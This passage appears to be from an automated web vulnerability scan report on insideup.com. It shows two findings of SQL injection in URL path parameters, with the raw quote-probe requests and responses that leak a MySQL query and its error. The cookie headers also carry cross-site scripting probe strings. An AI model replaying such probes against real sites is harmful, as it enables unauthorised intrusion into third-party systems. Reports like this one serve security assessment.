GET /ppc/leadflow''/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:40:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9oph1vbibkbf8aoh1u4h6na243; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/fist00/project_dynamic_page_updated.php was not found on this server.</p>

1.305. http://www.insideup.com/ppc/leadflow/fist00/project_dynamic_page_updated.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00'/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:41:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2mffr079qd3ua8gek16ac6dl52; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/fist00'/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3' OR prj.project_page_url = 'leadflow/fist00'/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=10003&group=fist00&template=3' OR prj.project_page_url = 'leadflow/fist00' at line 5

Request 2

GET /ppc/leadflow/fist00''/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:41:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mm145t4crclhjf4ir92h9n2l15; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/fist00''/project_dynamic_page_updated.php was not found on this server.</p>

1.306. http://www.insideup.com/ppc/leadflow/fist00/project_dynamic_page_updated.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project_dynamic_page_updated.php'?catId=10003&group=fist00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:41:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=0rjspfntfqaf0ldf2gc9spnei3; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/fist00/project_dynamic_page_updated.php'?catId=10003&group=fist00&template=3' OR prj.project_page_url = 'leadflow/fist00/project_dynamic_page_updated.php'?catId=10003&group=fist00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=10003&group=fist00&template=3' OR prj.project_page_url = 'leadflow/fist00' at line 5

Request 2

GET /ppc/leadflow/fist00/project_dynamic_page_updated.php''?catId=10003&group=fist00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; 